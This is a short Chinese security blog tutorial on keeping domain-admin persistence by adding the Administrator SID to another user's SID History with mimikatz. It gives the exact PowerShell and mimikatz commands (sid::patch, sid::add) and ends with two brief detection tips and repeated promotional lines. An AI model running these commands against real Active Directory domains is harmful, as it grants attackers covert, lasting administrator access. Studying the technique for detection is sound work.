作者:r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
0x00 前言
SID的主要作用是跟踪安全主体控制用户连接资源时的访问权限。
SID History 是在域迁移过程中需要使用的一个属性,SID History 主要作用是在域迁移过程中保持域用户的访问权限,如果迁移后域用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。
因此使用mimikatz可以将SID History 属性添加到域中任意用户的SID History 属性中。
在域渗透中,如果获得了域管理员权限,就可以将SID History 作为域权限维持方法。
0x01 本地测试
1、首先将Administrator的SID添加到恶意用户test的SID History属性中,首先在powershell查看test用户的SID History 属性:
Import-Module ActiveDirectory
Get-ADUser test -Properties sidhistory
2、然后以管理员权限运行mimikatz,将Administrator的SID添加到test用户的SID History 属性中:
privilege::debug
sid::patch
sid::add /sam:test /new:administrator
3、再次查看test用户的SID History:
Get-ADUser test -Properties sidhistory
0x01 总结
1、检查SID为500的用户;
2、域迁移之后,对相同SID History 属性的用户进行检查
0x02 了解更多安全知识
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!